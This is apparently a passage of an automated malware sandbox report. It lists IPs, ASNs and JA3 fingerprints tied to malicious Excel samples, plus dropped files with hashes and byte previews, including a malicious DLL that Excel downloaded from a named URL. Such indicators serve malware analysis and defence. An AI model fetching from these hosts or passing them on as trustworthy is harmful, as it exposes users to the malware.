ident.me | SecuriteInfo.com.Heur.31861.xls | malicious | 176.58.123.25
ident.me | SecuriteInfo.com.Exploit.Siggen3.9634.31858.xls | malicious | 176.58.123.25
ident.me | 0zwHgf4MZ6.exe | malicious | 176.58.123.25
ident.me | Rf1jy0FVcu.exe | malicious | 176.58.123.25
ident.me | RJVPg3z2Pu.exe | malicious | 176.58.123.25
ident.me | qy2ha7YNc2.exe | malicious | 176.58.123.25
ident.me | HfgoPFBORt.exe | malicious | 176.58.123.25
ident.me | PugSOXI5Eu.exe | malicious | 176.58.123.25
ident.me | WR7fzVlV34.exe | malicious | 176.58.123.25

ASN

Match | Associated Sample Name / URL | Detection | Context
NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | SecuriteInfo.com.Exploit.Siggen3.10350.14349.xls | malicious | 194.5.249.156
NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | SecuriteInfo.com.Exploit.Siggen3.10350.857.xls | malicious | 194.5.249.156
NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls | malicious | 194.5.249.156
NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | SecuriteInfo.com.Heur.1181.xls | malicious | 194.5.249.156
NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | SecuriteInfo.com.Heur.21235.xls | malicious | 194.5.249.156
NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | SecuriteInfo.com.Heur.15875.xls | malicious | 194.5.249.156
NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | SecuriteInfo.com.Heur.18554.xls | malicious | 194.5.249.156
NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | Sign-979329054_1327186231.xls | malicious | 194.5.249.156
NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | Sign-488964532_2104982999.xls | malicious | 194.5.249.156
NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | nazi.exe | malicious | 194.5.249.24
NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | SecuriteInfo.com.Heur.22173.xls | malicious | 194.5.249.156
NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | SecuriteInfo.com.Heur.28224.xls | malicious | 194.5.249.156
NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | SecuriteInfo.com.Heur.7735.xls | malicious | 194.5.249.156
NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | Sign_1136845514-2138034493.xls | malicious | 194.5.249.156
NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | Sign_1229872171-1113140666(1).xls | malicious | 194.5.249.156
NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | SecuriteInfo.com.Exploit.Siggen3.10048.21670.xls | malicious | 194.5.249.156
NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | SecuriteInfo.com.Exploit.Siggen3.10048.926.xls | malicious | 194.5.249.156
NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | SecuriteInfo.com.Exploit.Siggen3.10048.29300.xls | malicious | 194.5.249.156
NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | SecuriteInfo.com.Exploit.Siggen3.10048.21627.xls | malicious | 194.5.249.156
NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | index_2021-02-17-11_45.dll | malicious | 194.5.249.156
COMBAHTONcombahtonGmbHDE | SecuriteInfo.com.Exploit.Siggen3.10350.14349.xls | malicious | 45.155.173.242
COMBAHTONcombahtonGmbHDE | SecuriteInfo.com.Heur.1476.xls | malicious | 45.155.173.242
COMBAHTONcombahtonGmbHDE | SecuriteInfo.com.Heur.1138.xls | malicious | 45.155.173.242
COMBAHTONcombahtonGmbHDE | SecuriteInfo.com.Heur.11266.xls | malicious | 45.155.173.242
COMBAHTONcombahtonGmbHDE | Sign-979329054_1327186231.xls | malicious | 45.155.173.242
COMBAHTONcombahtonGmbHDE | Sign-488964532_2104982999.xls | malicious | 45.155.173.242
COMBAHTONcombahtonGmbHDE | kAZyIwSSsf.exe | malicious | 185.234.72.84
COMBAHTONcombahtonGmbHDE | nazi.exe | malicious | 212.114.52.24
COMBAHTONcombahtonGmbHDE | SecuriteInfo.com.Heur.22173.xls | malicious | 45.155.173.242
COMBAHTONcombahtonGmbHDE | Sign_77624265-298090224.xls | malicious | 45.155.173.242
COMBAHTONcombahtonGmbHDE | SecuriteInfo.com.Exploit.Siggen3.10048.21670.xls | malicious | 45.155.173.242
COMBAHTONcombahtonGmbHDE | SecuriteInfo.com.Exploit.Siggen3.10048.21085.xls | malicious | 45.155.173.242
COMBAHTONcombahtonGmbHDE | SecuriteInfo.com.Exploit.Siggen3.10048.24657.xls | malicious | 45.155.173.242
COMBAHTONcombahtonGmbHDE | SecuriteInfo.com.Exploit.Siggen3.10089.3000.xls | malicious | 185.234.72.84
COMBAHTONcombahtonGmbHDE | SecuriteInfo.com.Exploit.Siggen3.10048.3997.xls | malicious | 45.155.173.242
COMBAHTONcombahtonGmbHDE | SecuriteInfo.com.Exploit.Siggen3.10048.21627.xls | malicious | 45.155.173.242
COMBAHTONcombahtonGmbHDE | DocuSign_1618411389_250497852.xls | malicious | 185.234.72.84
COMBAHTONcombahtonGmbHDE | DocuSign_139380140_1184163298.xls | malicious | 185.234.72.84
COMBAHTONcombahtonGmbHDE | SecuriteInfo.com.Exploit.Siggen3.10048.18578.xls | malicious | 45.155.173.242
COMBAHTONcombahtonGmbHDE | Quote RF-E79-STD-2021-087.xlsx | malicious | 45.147.230.34
DIDEHABNNETIR | SecuriteInfo.com.Heur.13393.xls | malicious | 5.202.150.151
DIDEHABNNETIR | SecuriteInfo.com.Exploit.Siggen3.10048.21670.xls | malicious | 5.202.150.151
DIDEHABNNETIR | SecuriteInfo.com.Exploit.Siggen3.10048.24657.xls | malicious | 5.202.150.151
DIDEHABNNETIR | SecuriteInfo.com.Exploit.Siggen3.10048.14515.xls | malicious | 5.202.150.151
DIDEHABNNETIR | SecuriteInfo.com.Exploit.Siggen3.10048.29300.xls | malicious | 5.202.150.151
DIDEHABNNETIR | att-1664057138.xls | malicious | 5.202.150.151
DIDEHABNNETIR | 6anfy8I0II.exe | malicious | 5.202.120.150
DIDEHABNNETIR | ieO61Pwnmq.exe | malicious | 5.202.120.150
DIDEHABNNETIR | SecuriteInfo.com.Exploit.Siggen3.9634.13595.xls | malicious | 5.202.120.150
DIDEHABNNETIR | WZJIuy3UYm.exe | malicious | 5.202.150.151
SERVERPLAN-ASIT | SecuriteInfo.com.Exploit.Siggen3.10350.14349.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Exploit.Siggen3.10350.857.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Heur.1476.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Heur.1181.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Heur.21235.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Heur.15875.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Heur.21759.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Heur.2804.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Heur.1138.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Heur.11266.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Heur.18554.xls | malicious | 185.81.0.78

JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
05af1f5ca1b87cc9cc9b25185115607d | SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls | Get hash | malicious | Browse | 176.58.123.25
 | SecuriteInfo.com.Heur.1476.xls | Get hash | malicious | Browse | 176.58.123.25
 | SecuriteInfo.com.Heur.11266.xls | Get hash | malicious | Browse | 176.58.123.25
 | Sign-92793351_1597657581.xls | Get hash | malicious | Browse | 176.58.123.25
 | AWB783079370872.docm | Get hash | malicious | Browse | 176.58.123.25
 | document-750895311.xls | Get hash | malicious | Browse | 176.58.123.25
 | SecuriteInfo.com.Heur.22173.xls | Get hash | malicious | Browse | 176.58.123.25
 | SecuriteInfo.com.Exploit.Siggen3.10048.21085.xls | Get hash | malicious | Browse | 176.58.123.25
 | SecuriteInfo.com.Exploit.Siggen3.10048.24657.xls | Get hash | malicious | Browse | 176.58.123.25
 | SecuriteInfo.com.Exploit.Siggen3.10048.15397.xls | Get hash | malicious | Browse | 176.58.123.25
 | SecuriteInfo.com.Exploit.Siggen3.10048.29300.xls | Get hash | malicious | Browse | 176.58.123.25
 | DocuSign_167.xls | Get hash | malicious | Browse | 176.58.123.25
 | DocuSign_139380140_1184163298.xls | Get hash | malicious | Browse | 176.58.123.25
 | index_2021-02-17-11_45.dll | Get hash | malicious | Browse | 176.58.123.25
 | PO.xls | Get hash | malicious | Browse | 176.58.123.25
 | JF0qFPqOqZ.docx | Get hash | malicious | Browse | 176.58.123.25
 | SecuriteInfo.com.Exploit.Siggen3.10048.426.xls | Get hash | malicious | Browse | 176.58.123.25
 | Quotes.xlsm | Get hash | malicious | Browse | 176.58.123.25
 | IMG_51067.doc__.rtf | Get hash | malicious | Browse | 176.58.123.25
 | Request for Quotation76584454.ppt | Get hash | malicious | Browse | 176.58.123.25
8c4a22651d328568ec66382a84fc505f | SecuriteInfo.com.Exploit.Siggen3.10350.14349.xls | Get hash | malicious | Browse | 45.155.173.242, 193.8.194.96
 | SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls | Get hash | malicious | Browse | 45.155.173.242, 193.8.194.96
 | SecuriteInfo.com.Exploit.Siggen3.10350.857.xls | Get hash | malicious | Browse | 45.155.173.242, 193.8.194.96
 | SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls | Get hash | malicious | Browse | 45.155.173.242, 193.8.194.96
 | SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls | Get hash | malicious | Browse | 45.155.173.242, 193.8.194.96
 | SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls | Get hash | malicious | Browse | 45.155.173.242, 193.8.194.96
 | SecuriteInfo.com.Heur.1476.xls | Get hash | malicious | Browse | 45.155.173.242, 193.8.194.96
 | SecuriteInfo.com.Heur.15875.xls | Get hash | malicious | Browse | 45.155.173.242, 193.8.194.96
 | SecuriteInfo.com.Heur.21759.xls | Get hash | malicious | Browse | 45.155.173.242, 193.8.194.96
 | SecuriteInfo.com.Heur.2804.xls | Get hash | malicious | Browse | 45.155.173.242, 193.8.194.96
 | SecuriteInfo.com.Heur.1138.xls | Get hash | malicious | Browse | 45.155.173.242, 193.8.194.96
 | SecuriteInfo.com.Heur.11266.xls | Get hash | malicious | Browse | 45.155.173.242, 193.8.194.96
 | SecuriteInfo.com.Heur.18554.xls | Get hash | malicious | Browse | 45.155.173.242, 193.8.194.96
 | Sign-636.xls | Get hash | malicious | Browse | 45.155.173.242, 193.8.194.96
 | Sign-92793351_1597657581.xls | Get hash | malicious | Browse | 45.155.173.242, 193.8.194.96
 | Sign-979329054_1327186231.xls | Get hash | malicious | Browse | 45.155.173.242, 193.8.194.96
 | Sign-707465831_1420670581.xls | Get hash | malicious | Browse | 45.155.173.242, 193.8.194.96
 | SecuriteInfo.com.Heur.22173.xls | Get hash | malicious | Browse | 45.155.173.242, 193.8.194.96
 | SecuriteInfo.com.Heur.11712.xls | Get hash | malicious | Browse | 45.155.173.242, 193.8.194.96
 | SecuriteInfo.com.Heur.28224.xls | Get hash | malicious | Browse | 45.155.173.242, 193.8.194.96

Dropped Files

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes | SecuriteInfo.com.Exploit.Siggen3.10350.14349.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Exploit.Siggen3.10350.857.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Heur.1476.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Heur.1181.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Heur.21235.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Heur.15875.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Heur.21759.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Heur.2804.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Heur.1138.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Heur.11266.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Heur.18554.xls | Get hash | malicious | Browse |
 | Sign-636.xls | Get hash | malicious | Browse |
C:\Users\user\BASE.BABAA | SecuriteInfo.com.Exploit.Siggen3.10350.14349.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Exploit.Siggen3.10350.857.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Heur.1476.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Heur.1181.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Heur.21235.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Heur.15875.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Heur.21759.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Heur.2804.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Heur.1138.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Heur.11266.xls | Get hash | malicious | Browse |
 | SecuriteInfo.com.Heur.18554.xls | Get hash | malicious | Browse |
 | Sign-636.xls | Get hash | malicious | Browse |

                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                                                  File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):59134
                                                                                                                                                                                                                  Entropy (8bit):7.995450161616763
                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                  SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                                                                                                                                                  MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                                                                                                                                                  SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                                                                                                                                                  SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                                                                                                                                                  SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                                                  Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
Process:C:\Windows\System32\wermgr.exe
File Type:data
Category:dropped
Size (bytes):893
Entropy (8bit):7.366016576663508
Encrypted:false
SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
MD5:D4AE187B4574036C2D76B6DF8A8C1A30
SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious:false
Reputation:high, very likely benign file
Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Process:C:\Windows\System32\wermgr.exe
File Type:data
Category:dropped
Size (bytes):328
Entropy (8bit):3.0908522464605643
Encrypted:false
SSDEEP:6:kKwaPbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:3W3kPlE99SNxAhUeo+aKt
MD5:DBAC0F4F367066518103C7836B446107
SHA1:624845187C47C0AB5B186CFFD05A74E7FA8D7A71
SHA-256:283E817992CADBAF9E3198C1B7181C08D172F7719C2ACDD25F5806891A41E374
SHA-512:9B3ACF465E611D6BCB8206F160B704FDFE7B24D1436FFCA21B64E744A1750F5EED0B508769193876CBA13EE544F62F64140EC4DA48E6F9554E872C2B11EA31B0
Malicious:false
Reputation:low
Preview: p...... .........L.....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
Process:C:\Windows\System32\wermgr.exe
File Type:data
Category:dropped
Size (bytes):252
Entropy (8bit):3.018531379206123
Encrypted:false
SSDEEP:3:kkFklYQltfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKtwnliBAIdQZV7eAYLit
MD5:89B0055866A7A1585BBC1D3FAE86B411
SHA1:FB63F73ADD62C9D5957D10076F740E9CC1AAEABF
SHA-256:6D57DC7645218A8D6260AA82625BD20D81AD51810CFD7EA71909CFF154F3FFCD
SHA-512:C0E2214F8CA852832058F16A669707C408BD442203926DD656E4007430AED448480FFDA6F0185DF488A97C73CF786F12114911B88D77F8B0DE8C4DE9CA8B7C70
Malicious:false
Reputation:low
Preview: p...... ....`....u......(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:downloaded
Size (bytes):4591104
Entropy (8bit):5.0540147937501265
Encrypted:false
SSDEEP:49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9
MD5:25056DF6D3546DE971EAFE5DA5F9AE44
SHA1:179555B3D0391E45DF29E651B8ED0342D02FE88A
SHA-256:AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
SHA-512:8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50
Malicious:true
Antivirus:
• Antivirus: Metadefender, Detection: 11%
• Antivirus: ReversingLabs, Detection: 41%
Joe Sandbox View:
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.14349.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.857.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.1476.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.1181.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.21235.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.15875.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.21759.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.2804.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.1138.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.11266.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.18554.xls, Detection: malicious
• Filename: Sign-636.xls, Detection: malicious
Reputation:moderate, very likely benign file
IE Cache URL:http://www.chipmania.it/mails/open.php
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.y.K.*.K.*.K.*.#.+.K.*.#.+~K.*.#.+.K.*.;.+.K.*.;.+.K.*.#.+.K.*.K.*.K.*.;.+.K.*N:.+.K.*N:.+.K.*N:.*.K.*N:.+.K.*Rich.K.*........................PE..L....s/`...........!.....rB..........}A.......B..............................`F...........@......................... .D.`.....D.<.....D.Xp...................@F.....`.D.p............................D.@.............B.X............................text....qB......rB................. ..`.rdata........B......vB.............@..@.data...8.....D.......D.............@....rsrc...Xp....D..r....D.............@..@.reloc.......@F.......E.............@..B........................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\B7DE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):155530
Entropy (8bit):7.660456700199465
Encrypted:false
SSDEEP:3072:YxWVpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXs:YEGSzx0dmxk7RbsYsKtseoXc
MD5:0395050B4CB895A16AD84F8E70C521ED
SHA1:4B7903E8FF8F55C8A2B2C677A715411F2AA1558B
SHA-256:F9A0EA7DBEC7B9BEBA16AEB7412DF72087B2736159C3B2F314A8978B5DC42504
SHA-512:C34CCB734CD14F5C286A2B071822392274BD282E8AF45A3388CBBA60CD4D54FC2B8D9544ADB8F6088116DDF3197E3204A6255CD1E7959023CA9E84FB2DD10D8B
Malicious:false
Preview: ...n.0.E.......D'.....E....I?.&..k..a...;...5.K....{..H......"j.Zv..X.Nz.]..._..$...;h....,..?l.`E..[..>q...+......|.".m.x.r-:......K.R...[..J<.T.n....R;V}..Q-.!.-E"...#H.W+-Ay.hI...A(...5M.....R......#...tY8....Q..}%..,.`....r..*..^.}.wja...;..7a.^|c.......H....6.LSj.X!..ubi..v/..J$.r.....39...I...Q|O5r..w.T...|.c..O........0m...\..n':D.E.u..O....?..|.(........{...1...&.........1}.}@.."L.....]....4....u .t..<.\ .S...6/...........PK..........!..#|.....X.......[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Cab563C.tmp
                                                                                                                                                                                                                  Process:C:\Windows\System32\wermgr.exe
File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:dropped
Size (bytes):59134
Entropy (8bit):7.995450161616763
Encrypted:true
SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:E92176B0889CC1BB97114BEB2F3C1728
SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:false
C:\Users\user\AppData\Local\Temp\Tar563D.tmp
Process:C:\Windows\System32\wermgr.exe
File Type:data
Category:dropped
Size (bytes):152788
Entropy (8bit):6.316654432555028
Encrypted:false
SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
MD5:64FEDADE4387A8B92C120B21EC61E394
SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sat Feb 20 16:47:41 2021, atime=Sat Feb 20 16:47:41 2021, length=12288, window=hide
